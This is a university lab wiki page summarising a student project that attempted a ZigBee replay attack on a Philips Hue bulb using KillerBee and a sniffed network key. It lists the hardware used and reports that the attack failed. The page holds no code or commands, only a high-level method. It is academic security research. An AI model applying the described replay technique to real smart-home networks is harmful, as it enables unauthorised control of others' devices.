ZigBee Replay

From Embedded Lab Vienna for IoT & Security
Revision as of 08:31, 7 March 2019 by Lstrobl (talk | contribs)
Jump to navigation Jump to search

Summary

After successfully sniffing the Network Key of a ZigBee network as described in ZigBee Sniffing the next step is to conduct a replay attack by resending the decrypted on/off commands with adjusted counters.

Requirements

  • Operating system of attacking host: Kali Linux 64 Bit
    • Version 2018.2
  • Packages: KillerBee
  • Operating system of Raspberry Pi: RaspBee Gateway SD card image Raspbian Jessi RaspBee (Stable)
    • Version 01-2017

Authors

  • Daniel Tod
  • Luca Strobl

Results

  • <zbreplay> does not work due to counter queries
  • Python script to log the latest counters and create a packet with updated counters
    • Data is misinterpreted and therefore the FCS and MIC are wrong
    • Packet is not constructed
  • Documentation of the conducted project and source code of the python script

The authors suppose that the misinterpretation of data results from the limited hardware capacities of the Atmel RZ Raven USB stick. The solution would be a Software Defined Radio (SDR). The drivers of scapy were only written for the Ettus USRP but the authors were not provided with this SDR.

Used Hardware

  • Raspberry Pi 3 Model B+
  • SD card with at least 8 gigabyte of memory
  • Raspbee module
  • Philips Hue light bulb
  • Atmel RZ Raven USB stick
  • Kali Linux host
  • USB mouse and keyboard
  • external monitor
  • HDMI cable

Courses

Retrieved from "https://wiki.elvis.science/index.php?title=ZigBee_Replay&oldid=1251"